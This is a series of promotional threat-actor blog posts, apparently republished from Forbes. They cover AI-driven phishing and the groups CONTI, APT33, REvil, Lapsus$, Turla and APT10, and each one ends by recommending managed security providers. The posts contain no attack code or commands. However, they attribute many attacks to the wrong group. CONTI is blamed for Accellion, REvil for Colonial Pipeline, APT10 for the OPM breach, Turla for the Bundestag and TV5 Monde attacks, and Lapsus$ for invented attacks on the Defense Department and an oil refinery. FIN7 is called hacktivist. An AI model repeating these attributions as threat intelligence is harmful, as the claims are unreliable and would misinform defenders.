Almost Human: The Threat Of AI-Powered Phishing Attacks

Artificial Intelligence (AI) is undoubtedly a hot topic, and has been hailed as a game-changer in many fields including cybersecurity. There is much buzz about it, from the good, to the bad, and everything in between. Even Elon Musk and other tech leaders are advocating for AI development to be curbed, or at least slowed. While there are untold scintillating and amazing implications for AI technology in society, there are also plenty of bad and strange things that could happen. This is something we discussed in detail when the Metaverse was all the craze, but all of the technological scenarios pale in comparison to what happens when the plainest, simplest of threats wind up in the wrong hands.

Think Like a Hacker

As with any technological advancement, with AI there is always the potential for malicious misuse. To understand the impact of AI on cybersecurity, we need to first think like a hacker. Hackers like to use tools and techniques that are simple, easy, effective, and cheap. AI is all those things, especially when applied in fundamental ways. Thus, we can use our knowledge of the hacker mindset to get ahead of potential threats.

Aside from nation-state sponsored groups and the most sophisticated cyber hacker syndicates, the commotion over cyber hackers using AI in advanced technological ways is missing the bigger, more threatening point. AI is being used to mimic humans in order to fool humans. AI is targeting YOU, and can do so when you:

  • Click on a believable email
  • Pick up your phone or respond to SMS
  • Respond in chat
  • Visit a believable website
  • Answer a suspicious phone call

Just as AI is making everyday things easier, it’s making attacks easier for cybercriminals. They’re using the technology to write believable phishing emails with proper spelling and grammar correction, and to incorporate data collected about the target company, its executives, and public information. AI is also powering rapid, intelligent responses to messages. AI can rapidly create payloaded websites or documents that look real to an end-user. AI is also used to respond in real time with a deep faked voice, extracted from recording real voices through suspicious unsolicited spam calls.

Just the Beginning

Many of the hacks on the rise today are driven by AI, but in a low-tech way. AI tools are openly available to everyday people now, but have been in use in dark corners of the internet for a while, and often in surprisingly simple and frightening ways. The surging success rate for phishing campaigns, MITM (Man in the Middle attacks), and ransomware will prove to be related to arrival of AI and the surge of its adoption.

The use of AI in phishing attacks also has implications for the broader cybersecurity landscape. As cybercriminals continue to develop and refine their AI-powered phishing techniques, it could lead to an “arms race” between cybercriminals and cybersecurity professionals. This could result in an increased demand for AI-powered cybersecurity solutions, that might be both costly and complex to implement.

Cybersecurity Response

To protect against AI-powered phishing attacks, individuals and businesses can take several steps including:

  • Educating about the risks of phishing attacks and how to identify them
  • Implementing strong authentication protocols, such as multi-factor authentication
  • Using anti-phishing tools to detect and prevent phishing attacks
  • Implementing AI-powered cybersecurity solutions to detect and prevent AI-powered phishing attacks
  • Partnering with a reputable Managed Security Services Provider (MSSP) who has the breadth, reach, and technology to counter these attacks

AI is becoming ubiquitous in homes, cars, TVs, and even space. The unfolding future of AI and sentient technologies is an exciting topic that has long captured the imagination. However, the dark side of AI looms when it’s turned against people. This is the beginning of an arms escalation, although there is no AI that can be plugged into people (yet). Users beware.

This article was originally published in Forbes, please follow me on LinkedIn.

CONTI Hacker Group: The Young “For-Profit” Super-Cybercriminal Threat

As I wrap up my “know thy cyber-enemy” series, I have saved the “best” for last. Having emerged in late 2020, the CONTI hacker group is a relatively new player in the shadowy world of cybercrime. Despite its short history, the group has made a name for itself as a sophisticated and aggressive threat to businesses and organizations around the world.

Beyond providing education on adversarial hacker groups such as CONTI, this series has examined their behavior, targeting, tactics, and motivations. The resulting insights provide valuable, preemptive perspective on what kind of operational cybersecurity initiatives to pursue, what kind of technologies to invest in, and where vulnerability gaps in an organization’s operations may lie. To best mitigate risks, you must first understand the enemies beyond.

Double Extortion in a Wide Net

CONTI’s calling card is its extended use of ransomware. The group uses malware to encrypt victims’ data, then demands payment in exchange for the decryption key. Unlike other ransomware groups, however, CONTI has developed a reputation for using particularly aggressive tactics and demanding higher-than-average ransom payments. One of the most notable aspects of CONTI’s operations is its use of double extortion tactics. This involves not only encrypting the victim’s data, but also stealing sensitive information such as financial data, intellectual property, or personally identifiable information (PII). CONTI then threatens to release this information publicly if the victim does not pay the ransom.

The group’s operations are highly sophisticated and often involve multiple stages, including spear-phishing emails, network infiltration, and deployment of custom-built malware. CONTI’s malware is known for its ability to evade detection by antivirus software and to spread rapidly through an organization’s network. The group also adapts and evolves its tactics in response to changes in the cybersecurity landscape. For example, the group has been known to use the Ryuk ransomware strain in some attacks, which has been linked to other cybercriminal groups such as Wizard Spider and TrickBot.

While CONTI is relatively new on the scene, it has already made a significant impact. According to some estimates the hacker group has already earned millions of dollars in ransom payments from its victims, making it one of the most lucrative cybercriminal groups currently in operation. While other groups such as REVILAPT10, or APT33 are affiliated with Russian, Chinese, and Iranian intelligence services respectively, CONTI is a bit different. CONTI operates largely from Russia and Eastern Europe and is thought to be operating for members’ profit while also supporting the Russian invasion of Ukraine.

To date, CONTI has targeted a wide range of businesses and organizations including healthcare providers, government agencies, and educational institutions. While some groups focus on specific industries, CONTI has shown a willingness to target any organization it believes can be successfully compromised. One of the most high-profile attacks attributed to CONTI occurred in February 2021 when the group targeted the Accellion file transfer service, compromising the data of dozens of organizations around the world. CONTI has also been linked to the May 2021 attack on Ireland’s health service that caused significant disruption to the country’s healthcare system.

A Significant Threat to Businesses

The CONTI hacker group has quickly established itself as a significant threat to businesses and organizations worldwide. The group’s use of double extortion tactics and aggressive ransomware attacks has resulted in millions of dollars in ransom payments and the compromise of sensitive data. The challenge that stems from this ruthlessly efficient and threatening hacker group is ugly and significant. With its aggressive tactics and willingness to target organizations in a wide range of industries, CONTI is likely to continue to pose a significant risk for years to come.

Understanding the behavior, targeting, tactics, and motivation of adversarial hacking groups like CONTI can guide organizations in designing strong cybersecurity strategies. To mitigate the threat posed by CONTI and other hacking groups, businesses and organizations need to have a multi-layered security program that includes endpoint protection, continuous user awareness and training, vulnerability assessments, incident response planning, and collaboration with other organizations and industry groups.

Preparation and Response

The CONTI threat profile highlights the importance of endpoint protection and detection through EDR, application protection, Cloud Access Security, and other systems that protect endpoints, applications, and workloads in a variety of operational environments. It also emphasizes the need for continuous user awareness and training as well as continual incident monitoring.

The group also highlights the importance for businesses and organizations to be vigilant in their monitoring and response to potential security incidents. This includes conducting regular vulnerability assessments, training employees on the risks of social engineering tactics such as spear-phishing emails, and implementing a well-defined incident response plan. These components of a multi-layered security program are critical to mitigating the CONTI threat.

By remaining vigilant and proactive and implementing robust cybersecurity measures, as well as through partnership with reputable Managed Security Service providers (MSSP), organizations can minimize the risk of falling victim to CONTI and other cybercriminal groups. They can also safeguard their data and systems for the future.

This article was originally published in Forbes, please follow me on LinkedIn.

Inside The Shadowy World Of Iranian Cyber Espionage Group APT33

Several of the most threatening cybercrime groups today carry the inside industry name of “APT.” APT stands for Advanced Persistent Threat, and an advanced persistent threat (APT) is a clandestine type of cyberattack or group that uses APT techniques in which the attacker gains and maintains unauthorized access to a targeted network and remains undetected for a significant period of time. During the time between infection and remediation, the hacker will often monitor, intercept, and relay information and sensitive data. APTs often use social engineering tactics or exploit software vulnerabilities in organizations with high value information.

Despite having similar names, each “APT” group is distinct with separate history, tactics, and targeting. In our hacker series, we already covered APT 28 (Fancy Bear) and APT 10 (Stone Panda). Today, we focus on APT33.

Who is APT33

APT33, also known as Elfin, is a cyber espionage group operating since at least 2013. APT33 is believed to operate out of the geographic boundaries of the Islamic Republic of Iran and has been linked to attacks on targets in the Middle East, Europe, and the United States. The group’s focus is on gathering intelligence on organizations in the aerospace, energy, and petrochemical sectors, as well as on government agencies and academic institutions.

Sophisticated International Threat

APT33 is significant because its tactics are highly sophisticated and involve the use of custom-built malware and advanced social engineering. The group typically gains access to targets through spear-phishing emails, exploiting vulnerabilities in software, or using stolen login credentials. Once inside a network, APT33 will often spend months or even years mapping out an organization’s systems and stealing sensitive data before exfiltrating it back to its command-and-control servers.

One of the most concerning aspects of APT33’s operations is its use of “watering hole” attacks, which involve compromising a website known to be frequented by a particular group of users. This allows APT33 to infect the computers of its intended targets without the need for spear-phishing emails or other direct methods of attack.

APT33 Targets Matter

While APT33 could conceivably target companies in any industry, a key characteristic of this group’s operations is its focus on specific industries and sectors, particularly those related to aerospace, energy, and petrochemicals. This furthers the evaluation that the group is working on behalf of the Iranian government or the Iranian Republican Guard, working to acquire sensitive technology and intelligence to further its geopolitical goals. Organizations operating in these industries should remain vigilant, and take steps to review sign-in and behavior logs, research threats and anomalies, and sweat the “small stuff” that might be tied to this specific threat group.

The Critical Importance of Understanding This Enemy

It cannot be overstated that cybersecurity enemies are continually evolving and becoming more sophisticated in their tactics and approaches. This makes the challenge of keeping pace more difficult for organizations. However, by understanding the tactics and motivations of cybercriminals it is possible for companies to stay ahead of potential threats and develop effective defense strategies. For example:

  • Understanding cybersecurity enemies can help companies identify potential vulnerabilities, capability gaps, and weaknesses in their security infrastructure.
  • Analyzing past cyberattacks and understanding the motivations behind them allows companies to anticipate potential attacks and take proactive, preventative measures. These can include implementing additional security such as firewalls or intrusion detection systems, or training employees to recognize and avoid common phishing attacks.
  • Understanding cybersecurity enemies can help companies respond more effectively to attacks when they do occur and empower them to develop effective incident response plans to minimize the damage caused by an attack and quickly restore systems and data.

There’s Always More To Do

Organizations face an increasing risk from cybercriminals like APT33, who use advanced tactics to exploit vulnerabilities and compromise digital assets. To safeguard their digital estate and data from such threats, businesses must adopt a multi-layered cybersecurity approach and seek the guidance of security experts. One such expert partner is a Managed Security Services Provider (MSSP) who can offer expertise, technology, and infrastructure to address their security needs, while simultaneously reducing the complexity and cost of managing security in-house.

As cybercriminals continue to evolve and become more sophisticated, it is critical to understand their approaches and motivations. By analyzing past cyberattacks MSSPs can anticipate future attacks and take proactive measures against them. This can include anything from firewalls or intrusion detection systems, to implementing tools like Machine Learning and Artificial Intelligence to recognize common phishing attacks or threat hunting. MSSPs have a unique perspective on the threat landscape, as they manage thousands of customers and see threat vectors and attacks ahead of what a single enterprise can see.

Ultimately, the best defense against APT33 and other advanced, persistent threats is a proactive and collaborative approach to cybersecurity informed by a deep understanding of the threat landscape. With the right combination of advanced technology, regular employee training, heightened awareness of potential risks, and partnership with an MSSP, organizations can mitigate the threat of these rogue and dangerous APT groups.

This article was originally published in Forbes, please follow me on LinkedIn.

The REvil Gang Story: The “Good Guys” Can Still Prevail

Out of all the cybercrime gangs out there, mention the name “REvil” and you will get a palpable response based on the threat this notorious Russian-based group posed. REvil, also known as Sodinokibi, was a notorious ransomware gang that was active from at least April 2019 until (officially) it was dismantled in January 2022. Leading up to its demise, REvil became one of the most successful and damaging cybercrime syndicates in the world. The group was responsible for some of the most high-profile ransomware attacks in recent history.

Ruthless REvil

In May 2021, REvil was found to behind the attacks on JBS and Colonial Pipeline, which disrupted operations at poultry and pork processing plants across the world and resulted in fuel shortages in the southeastern United States. In July 2021 they targeted Kaseya, a software company that provides IT services to thousands of businesses around the world. The attack impacted an estimated 1,500 companies in total.

Needless to say, REvil’s methods were sophisticated and highly effective. The group typically gained access to targets through spear-phishing emails, exploiting vulnerabilities in software, or using stolen login credentials. Once inside a network, REvil actors would spend weeks, or even months, mapping out the organization’s systems and stealing sensitive data before launching a ransomware attack.

The consequences of REvil attacks were devastating for the industry and enterprises they affected. The group’s ransom demands were often in the millions, and paying the ransom provided no guarantee data would be restored. Even worse, REvil was among the hacker groups that went beyond “normal” ransomware attacks and exfiltrated data before encrypting it. This means that if the victim pays the ransom, the attackers may still leak stolen data or use it for future attacks.

The End of REvil

Thankfully, beginning in mid-2021 the wheels started to come off for REvil until eventually they were stopped. Initially, REvil seemed to remove their sites and infrastructure from the internet. Then, bit by bit, community-based efforts helped undo the damage they had inflicted through open decryption tools. This subverted their trusted position in underground communities, and ultimately, a joint, multinational effort disrupted the group’s networks, servers, and backups. In a matter of weeks, indictments and arrests were announced.

A Tale of Victory

The REvil episode is a tale of victory that showed it’s possible to conquer a sophisticated and dangerous hacker group, and also illustrated how. REvil’s story showcased some important steps law enforcement agencies can take to help combat cybercrime:

  • Collaborate: One of the most important steps law enforcement agencies can take is to collaborate with other agencies, both international and domestic. By working together, law enforcement agencies can pool resources and share information to track down and apprehend groups.
  • Develop Intelligence: This involves gathering information on a group’s activities, methods of attack, and members. Law enforcement agencies can use a variety of methods to gather intelligence, including monitoring online forums and social media, conducting interviews with suspects, and using forensic analysis to gather digital evidence.
  • Legal Tooling: Law enforcement agencies can use a range of legal tools to stop hacker groups. For example, they can obtain warrants to search suspects’ computers and devices, and use wiretaps to monitor communications. Additionally, forfeiture laws can be used to seize assets that were obtained through illegal means.
  • Increase Awareness: Another important step is to increase awareness of cybercrime and its consequences. Law enforcement agencies can work with businesses and organizations to ensure they understand the risks.
  • Invest in Security Services: A recent Gartner survey shows the majority of organizations are pursuing security vendor consolidation in 2022. This trend indicates that organizations are looking to simplify their security infrastructure and streamline security operations. Consolidation can help organizations reduce costs, improve security effectiveness, and increase operational efficiency. By reducing the number of security vendors and products, organizations can focus their resources on a smaller set of solutions and better integrate their security tools. This approach can also help organizations improve visibility into their security posture, as well as better manage and respond to security incidents.

Fighting back against criminal cyberhacker groups is a formidable, challenging mission, but not an impossible one. Ultimately, the fight against cybercrime requires a multi-faceted approach that involves both law enforcement agencies and other stakeholders working together.

A Stark Reminder

The REvil gang serves as a stark reminder of the ongoing threat posed by cybercrime – and the importance of being proactive in our fight against it. It is crucial that law enforcement agencies, businesses, and individuals work together to combat cybercrime and protect ourselves from its devastating consequences.

As IT professionals and executives, we have a responsibility to do our part in this fight. We must prioritize cybersecurity measures and educate our employees about the risks of cybercrime. We should be willing to collaborate and share information with others in our industry, as well as law enforcement agencies, to stay ahead of emerging threats.

While the fight against cybercrime may seem daunting, the demise of the REvil gang is a testament to the power of collaborative efforts and a multi-faceted approach. By working together and leveraging technology, we can prevail against even the most sophisticated and dangerous cybercriminals. In the end, it is up to us to stay vigilant and take action to protect ourselves, our businesses, and our communities.

This article was originally published in Forbes, please follow me on LinkedIn.

Teenagers Leveraging Insider Threats: Lapsus$ Hacker Group

Of all the threatening hacker groups out there, one of the most notorious is the Lapsus$ gang. While we covered APT10APT28, and Turla in prior articles, Lapsus$ presents some of the most significant threats on the cyber landscape. In this post, the fifth in our Hacker Series, we’ll look at Lapsus$, important highlights about the group, and all we can do about their presence on the threat scene.

Who is Lapsus$?

Lapsus$ is a hacker group that has been active since at least 2019, and whose mastermind is rumored to be a 16-year-old teenager from Oxford, England. The group is believed to be highly organized and well-funded, with members from various countries around the world.

Lapsus$ is known for their high-profile cyberattacks on government and corporate targets, as well as their use of sophisticated malware and encryption techniques.

By leveraging insiders through social engineering or bribery, the Lapsus$ group has a proven track record of successful attacks on high-profile targets which have resulted in significant financial losses and raised concerns about national security. In March 2022, Lapsus$ became well known for a series of daring cyberattacks against tech company darlings including Microsoft, Nvidia, and Samsung.

The group’s motivations and goals are not entirely clear, but they have been known to demand large sums of money in exchange for not releasing stolen information. They are also thought to have political motivations, as some of their attacks have targeted government agencies.

Notorious Attacks and Methods

One of Lapsus$’ most notable socially engineered attacks was on the U.S. Department of Defense in 2020. During this attack they were able to gain access to sensitive information, and caused significant disruption to the agency’s operations. The group has also targeted several major banks, stealing millions of dollars in the process.

Another notable attack attributed to Lapsus$ occurred in 2020 and was targeted at a major healthcare provider. During this attack, the group was able to access and steal the sensitive personal information of millions of patients. This attack not only resulted in financial losses for the healthcare provider, but also raised serious concerns about the protection of personal data and privacy.

Lapsus$ has also been known to target the energy sector, and oil and gas companies in particular, causing significant disruption to their operations. In one instance the group was able to gain control over the control systems of a major oil refinery, causing a shutdown in their operations and a significant loss of revenue.

They are known to use social engineering attacks using the communication app Telegram, and advanced malware, such as ransomware and trojans, to gain access to and control over their victims’ networks. In addition to their socially engineered cyberattacks, Lapsus$ is also known for their use of encryption and other techniques to hide their tracks and evade detection. While the U.K. arrested a band of seven teenagers affiliated with Lapsus$, the majority of their operatives have been able to successfully evade law enforcement’s efforts to track them down.

The Hunt for Lapsus$

Despite their high-profile attacks and the efforts of law enforcement and cybersecurity experts, Lapsus$ continues to be active and poses a significant threat to governments and corporations worldwide. The group’s use of advanced malware and encryption techniques has made them difficult to track and apprehend, and law enforcement agencies have had limited success in identifying and arresting members of the group. There have been a few reported arrests of individuals believed to be associated with Lapsus$, but it is unclear if these arrests have had any impact on the group’s operations as they re-emerged shortly after.

What You Can Do About Lapsus$

Given the group’s ability to infiltrate insiders, it’s important for organizations and individuals to be aware of the potential threat they pose. Organizations need to stay connected to the cybersecurity community, and take necessary steps to protect themselves from this threat that even industry juggernauts like Microsoft and Nvidea fell for. This includes measures such as regularly updating software and systems, backing up important data, and staying vigilant for suspicious activity on their networks. An approach that’s built on all-around monitoring and anomaly detection can help minimize Lapsus$ group’s advanced threats, insider actions, and malicious attacks.

Overall, the Lapsus$ group continues to be a serious threat to governments, corporations, and individuals. Their ability to evade law enforcement and carry out high-profile attacks highlights the need for continued efforts to improve cybersecurity and bring these cybercriminals to justice.

This article was originally published in Forbes, please follow me on LinkedIn.

Turla Hacking Group: A Persistent International Threat

As we continue our series of articles on state-sponsored cyberattack groups, we turn our focus to the Russia-affiliated Turla hacking group. In previous articles, we examined some of the biggest threats on the cyberattack scene, including APT10 and APT28 (also known as Fancy Bear). These notorious groups are a lurking presence, and Turla is no exception. Active for over a decade, the Turla hacking group is believed to be operating out of Russia and closely affiliated with the FSB, the Russian intelligence agency and successor to the KGB. It is also known by the names “Waterbug” and “Venomous Bear,” and has been linked to numerous high-profile cyberattacks on government agencies, embassies, and organizations around the world.

Destructive Path

Turla has been linked to 45 high-profile attacks, including the German Bundestag in 2014, the Ukrainian Parliament in 2014, and the French TV5 Monde in 2015. The group also targets organizations in the Middle East, particularly in the energy sector. Turla’s use of sophisticated methods and its focus on government and diplomatic targets has led experts to believe the group is working on behalf of the Russian government, although this has yet to be definitively proven.

Methods of Mayhem

Turla is known for using a variety of tactics to compromise networks, including “living off the land” tactics, watering hole attacks, spear-phishing emails, and compromised satellite connections. The group also uses publicly available tools like Metasploit and PowerShell, as well as Command and Control (C2) infrastructure like Google Drive and Dropbox. One of Turla’s primary tactics is the use of “second-stage” malware, which is activated after a victim’s initial infection and used to establish a backdoor into the network. From there, the group can steal sensitive information and move laterally within the network to gain access to other systems.

Turla is especially dangerous due to its use of advanced, next-level tactics. In recent years, the group has been observed using a unique malware called “Turla” or “KRYPTON” that can steal data from air-gapped computers not connected to the internet. The malware uses “audio exfiltration” to transmit data using the computer’s speakers and microphones. The group is extremely sophisticated and can evade detection for long periods of time. In 2014, for example, Turla maintained a foothold in a European government agency’s network for over two years before being discovered.

Wrestling A Bear

Turla is a highly sophisticated and persistent hacking group that has been known to target a wide range of organizations around the world. Without the right tools and partnership, defending against Turla is like wrestling a bear. The group’s use of highly sophisticated second-stage malware and its ability to evade detection make it a formidable threat, and one that organizations should be aware of and take immediate steps to protect against. This includes implementing robust comprehensive security measures such as multi-factor authentication, intrusion detection and prevention systems, and regular security training for employees. Equally as important, organizations should be vigilant in monitoring their networks for signs of compromise and should take prompt action if suspicious activity is detected. Partnering with managed security providers can bring valuable expertise, resources, and technology to those looking to defend against the threat posed by Turla and similar groups. These providers can offer expert round-the-clock monitoring, incident response, and threat intelligence to help organizations stay ahead of the constantly evolving threat landscape.

This article was originally published in Forbes, please follow me on LinkedIn.

Spotlight on APT10

To kick off our series highlighting the most notorious and dangerous hacker groups in the industry today, we will focus on a group called APT10. APT10, also known as Stone Panda or Red Apollo, is a state-sponsored Chinese hacking group that has been active since at least 2009. The group targets a wide range of organizations including government agencies, military organizations, and businesses in various industries. 

Who is APT10 

APT10 is not a standalone group, but part of a larger Chinese cyber espionage campaign known as Operation Cloud Hopper, which targets managed service providers (MSPs) to gain access to their clients’ networks. In 2018, two Chinese nationals associated with the Chinese Ministry of State Security (MSS) were indicted by the US Department of Justice for their role in APT10’s cyber espionage activities. This was a significant development in the ongoing effort to combat state-sponsored cyber attacks. 

APT10 Aims High 

APT10 knows no boundaries when it comes to attacks. For example, one of the group’s most notable campaigns was in 2014 when it targeted the US Office of Personnel Management (OPM) and stole the personal information of over 21 million government employees. This was considered one of the largest breaches of federal government data in US history. 

APT10 is also known for its focus on intellectual property theft, particularly of sensitive business and technological information. APT10 is believed to have targeted multiple organizations in the aerospace, defense, and energy sectors, as well as technology and engineering fields. Because of this targeting and the exfiltration of data, this group poses a significant national threat, especially from the Chinese state. 

Methods of APT10 Attacks 

APT10’s use of advanced techniques such as custom malware and spear-phishing campaigns make the group technically unique. They use a variety of tools and techniques to infiltrate and maintain access to target networks, including remote access trojans (RATs) and web shells. 

In addition, APT10 uses the technique of “living off the land” to evade detection and maintain access to target networks. This involves using legitimate tools and processes already present on a system, rather than introducing new malware or other malicious software. 

APT10 also uses “watering hole” attacks, where the group compromises a website likely to be visited by its intended targets in order to infect their systems with malware or steal sensitive information. This technique allows the group to focus on the most valuable targets. 

In recent years, APT10 has been observed using various malware families such as PlugX, Quasar, and RedLeaves. These malware families are used to establish a foothold on a target network and gain persistence. The group has also been known to use infrastructure leased from legitimate, but unaware, hosting providers, making it difficult to trace the origin of the attack. 

Preparing for APT10 

It is difficult to prepare for APT10’s attacks due to the limitless cloud and datacenter perimeters. The best approach is to be aware and implement multiple layers of security.  

With the growing number of cyber-attacks and concern about state-sponsored hacking groups like APT10, organizations need to take a proactive approach to protection. This includes implementing strong and comprehensive full-stack security measures such as managed firewalls, intrusion detection and prevention systems, and regular updates to software and systems. Most importantly, professional 24×7 active technical monitoring is a necessity for a well-protected computing system environment. 

Organizations can take several steps to protect themselves against APT10 and other state-sponsored hacking groups: 

  • Implement strong security measures: This includes using fully managed firewalls from a trusted third party, fully managed intrusion detection, end point protection and prevention systems, and regularly updating software and systems. 
  • Technical monitoring: Active technical monitoring is critical to a well-protected environment. Organizations should partner with a trusted managed security operations center provider to gain access to tools and techniques that detect unusual network activity and potential threats. 
  • Incident response plans: Organizations should have incident response plans in place, including procedures to minimize damage and a team or partner ready to respond quickly to an attack. 
  • Awareness and education: Employees should be trained on the importance of cybersecurity and how to detect and report suspicious activities. 
  • Partner with security experts: Organizations can partner with security experts familiar with numerous threats across industries, and leverage their knowledge and experience to stay ahead of threat actors. 
  • Use multiple layers of security: With the increasing number of cyber attacks, organizations need to use multiple layers of security including network security, endpoint security, and application security. 
  • Regularly assess and update security measures: Organizations should regularly assess and update their security and compliance measures to stay ahead of the latest threats. 

A Significant Threat 

That is just a quick look at APT10, the well-known and dangerous Chinese state-sponsored hacking group that’s been active for over a decade. This sophisticated and well-funded group has been responsible for a number of high-profile cyber attacks and, as APT10 continues to evolve its tactics and techniques, it poses an ongoing threat to organizations around the world.  It should be a critical mission for organizations to be aware of the group and to take steps to protect themselves from APT10.

This article was originally published in Forbes, please follow me on LinkedIn.

The Art of Cyberwar: Understanding Your Enemy

The ancient book on war, “The Art of War” by Sun Tzu, holds many lessons that are surprisingly applicable to today’s cybersecurity operations. One of the most important lessons is captured in the following line:

“If you know yourself but not the enemy, for every victory gained you will also suffer a defeat. If you know neither the enemy nor yourself, you will succumb in every battle.”

Cyber adversaries are often referred to as “hackers,” but in reality they come in many forms and have varying motivations and techniques. Some groups are well-organized, while others are loosely structured. Some are government-affiliated, while others are purely criminal or terrorist organizations. 

As Sun Tzu advised, it is crucial to have a deep understanding of one’s enemies. In this series of articles, we will examine the major global hacking groups and discuss the best ways to protect against them.

Beset by Dangers: The Most Notorious Groups

Cyber threats are becoming increasingly common and sophisticated in today’s digital age, and hacker groups comprise a significant part of this threat landscape. They are well-funded entities that use their skills to infiltrate, steal, or ransom sensitive information from governments, businesses, and individuals.  

A complete list of these groups would be voluminous, but below I highlight some of the most dangerous hacker groups currently operating: 

  • APT10, also known as Stone Panda or Red Apollo, is a Chinese state-sponsored group that targets intellectual property and business information. The group has been active since at least 2009, and has been linked to several high-profile breaches such as those of the U.S. Navy and the Australian government. APT10 employs a variety of techniques, including phishing, malware, and supply chain attacks, and is believed to focus on technology and manufacturing companies as well as government agencies. 
  • Lazarus Group is a hacker group believed to be operating out of North Korea. The group has been linked to several high-profile cyber attacks, including the Sony Pictures hack in 2014 and the WannaCry ransomware attack in 2017. Lazarus Group uses sophisticated tactics, such as zero-day vulnerabilities and custom malware, to infiltrate its targets. The group has also been linked to several high-profile financial crimes, such as the theft of $81 million from the Bangladesh central bank in 2016. 
  • Turla is a Russian state-sponsored group known for stealing sensitive information from governments and businesses. The group has been active since at least 2007, and focuses on government and diplomatic organizations. Turla uses tactics like watering hole attacks, spear-phishing, and custom malware to infiltrate its targets. 
  • APT33, also referred to as Elfin or Holmium, is an Iranian-linked group that has been active since 2013. The group targets aerospace and energy companies, as well as government organizations, and employs tactics like spear-phishing and custom malware. APT33 is also known for using “living-off-the-land” tactics that leverage legitimate tools and software to evade detection. 
  • FIN7, also known as the Carbanak Group, is a financially motivated hacktivist group that has been active since 2013. FIN7 targets the retail and hospitality industries with point-of-sale malware and uses advanced social engineering tactics to infiltrate targets. The group is believed to have stolen millions of dollars from its victims. 
  • REvil, also known as Sodinokibi, is an infamous ransomware group that has been active since 2018. The group uses ransomware to encrypt victims’ data and demands large sums of money for the decryption key. REvil made headlines in 2020 and 2021 with large-scale attacks on companies and government organizations. 
  • Lapsus is a criminal organization that is involved in various illegal activities such as cybercrime, fraud, and hacking. The group is known for its advanced tactics, the technique of bribing key insider employees, and for using the communication platform Telegram, which have allowed them to carry out successful attacks on high-profile targets.

Be Aware and Prepare 

The threats posed by hacker groups are growing more severe and sophisticated. These groups are known to be highly skilled and well-funded, and to use advanced tactics. They can cause serious damage and pose a significant threat to organizations and individuals. It is important for organizations to be aware of the myriad risks and take appropriate measures to protect themselves. By staying informed and taking proactive and comprehensive steps to secure IT infrastructures, networks, data, applications, and endpoints, organizations can better defend against cyber threats. Additionally, organizations should be prepared to recover in a timely manner should an attack be successful. Organizations should also have a comprehensive program in place to remain vigilant in monitoring for suspicious internal and external activities, and be prepared to respond quickly in the event of a breach. 

Sun Tzu’s Timeless Advice  

By focusing on specific hacker groups in subsequent posts, we can begin to understand the motivations behind these operations, the methodologies each group uses, the specter of business impact to communities at large, and ways to defend against attacks through a comprehensive security approach. The key to success in defending against cyber threats is to be proactive and have an encompassing security program in place. By staying informed, taking appropriate measures to secure networks and data, and preparing for and responding to incidents, organizations can minimize their risk of becoming the victim of a cyber attack.  By following Sun Tzu’s timeless advice to “know your enemy,” organizations can better understand hacker groups – and thus better defend against them.

This article was originally published in Forbes, please follow me on LinkedIn.